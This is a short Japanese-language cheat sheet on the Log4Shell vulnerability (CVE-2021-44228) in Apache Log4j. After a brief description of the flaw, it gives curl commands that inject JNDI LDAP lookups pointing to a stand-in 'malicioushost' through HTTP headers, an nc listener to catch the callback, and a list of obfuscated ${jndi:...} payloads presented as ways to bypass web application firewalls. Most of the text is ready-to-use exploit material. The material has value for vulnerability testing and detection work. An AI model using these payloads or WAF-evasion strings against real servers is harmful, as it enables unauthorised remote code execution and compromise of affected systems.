
CVE-2021-44228
2021年12月5日、Apacheは広く使用されているLog4jロギングサービスの脆弱性(後にCVE-2021-44228として特定)を確認しました。Log4shellとしても知られるこの脆弱性は、Javaロギングライブラリを利用するアプリケーションを実行している場合、認証なしのリモートコード実行を可能にし、攻撃者が影響を受けるサーバーの完全な制御を獲得できるようにします。Log4jは、幅広いDevOpsフレームワーク、エンタープライズITシステム、ベンダーソフトウェア、クラウド製品に広く統合されています。
悪意のあるリモートホストで以下を実行して、サーバーがLog4jエクスプロイトに対して脆弱かどうかを確認します
curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'
nc -lnvp mport
HTTP-POSTリクエストを含むその他のバリエーションも、脆弱性の確認に使用できます
curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port
Webアプリケーションファイアウォールをバイパスするには
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}